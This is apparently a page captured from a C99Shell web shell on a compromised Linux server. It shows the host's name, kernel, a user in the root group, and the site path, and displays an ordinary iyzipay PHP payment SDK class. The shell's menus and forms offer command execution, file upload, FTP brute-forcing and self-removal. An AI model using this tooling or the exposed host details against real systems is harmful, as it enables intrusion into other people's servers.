!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/Request/   drwxr-xr-x
Free 28.52 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CreateBasicBkmInitializeRequest.php (3.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay\Request;

use 
Iyzipay\JsonBuilder;
use 
Iyzipay\Request;
use 
Iyzipay\RequestStringBuilder;

class 
CreateBasicBkmInitializeRequest extends Request
{
    private 
$connectorName;
    private 
$price;
    private 
$callbackUrl;
    private 
$buyerEmail;
    private 
$buyerId;
    private 
$buyerIp;
    private 
$posOrderId;
    private 
$installmentDetails;

    public function 
getConnectorName()
    {
        return 
$this->connectorName;
    }

    public function 
setConnectorName($connectorName)
    {
        
$this->connectorName $connectorName;
    }

    public function 
getPrice()
    {
        return 
$this->price;
    }

    public function 
setPrice($price)
    {
        
$this->price $price;
    }

    public function 
getCallbackUrl()
    {
        return 
$this->callbackUrl;
    }

    public function 
setCallbackUrl($callbackUrl)
    {
        
$this->callbackUrl $callbackUrl;
    }

    public function 
getBuyerEmail()
    {
        return 
$this->buyerEmail;
    }

    public function 
setBuyerEmail($buyerEmail)
    {
        
$this->buyerEmail $buyerEmail;
    }

    public function 
getBuyerId()
    {
        return 
$this->buyerId;
    }

    public function 
setBuyerId($buyerId)
    {
        
$this->buyerId $buyerId;
    }

    public function 
getBuyerIp()
    {
        return 
$this->buyerIp;
    }

    public function 
setBuyerIp($buyerIp)
    {
        
$this->buyerIp $buyerIp;
    }

    public function 
getPosOrderId()
    {
        return 
$this->posOrderId;
    }

    public function 
setPosOrderId($posOrderId)
    {
        
$this->posOrderId $posOrderId;
    }

    public function 
getInstallmentDetails()
    {
        return 
$this->installmentDetails;
    }

    public function 
setInstallmentDetails($installmentDetails)
    {
        
$this->installmentDetails $installmentDetails;
    }

    public function 
getJsonObject()
    {
        return 
JsonBuilder::fromJsonObject(parent::getJsonObject())
            ->
add("connectorName"$this->getConnectorName())
            ->
addPrice("price"$this->getPrice())
            ->
add("callbackUrl"$this->getCallbackUrl())
            ->
add("buyerEmail"$this->getBuyerEmail())
            ->
add("buyerId"$this->getBuyerId())
            ->
add("buyerIp"$this->getBuyerIp())
            ->
add("posOrderId"$this->getPosOrderId())
            ->
addArray("installmentDetails"$this->getInstallmentDetails())
            ->
getObject();
    }

    public function 
toPKIRequestString()
    {
        return 
RequestStringBuilder::create()
            ->
appendSuper(parent::toPKIRequestString())
            ->
append("connectorName"$this->getConnectorName())
            ->
appendPrice("price"$this->getPrice())
            ->
append("callbackUrl"$this->getCallbackUrl())
            ->
append("buyerEmail"$this->getBuyerEmail())
            ->
append("buyerId"$this->getBuyerId())
            ->
append("buyerIp"$this->getBuyerIp())
            ->
append("posOrderId"$this->getPosOrderId())
            ->
appendArray("installmentDetails"$this->getInstallmentDetails())
            ->
getRequestString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--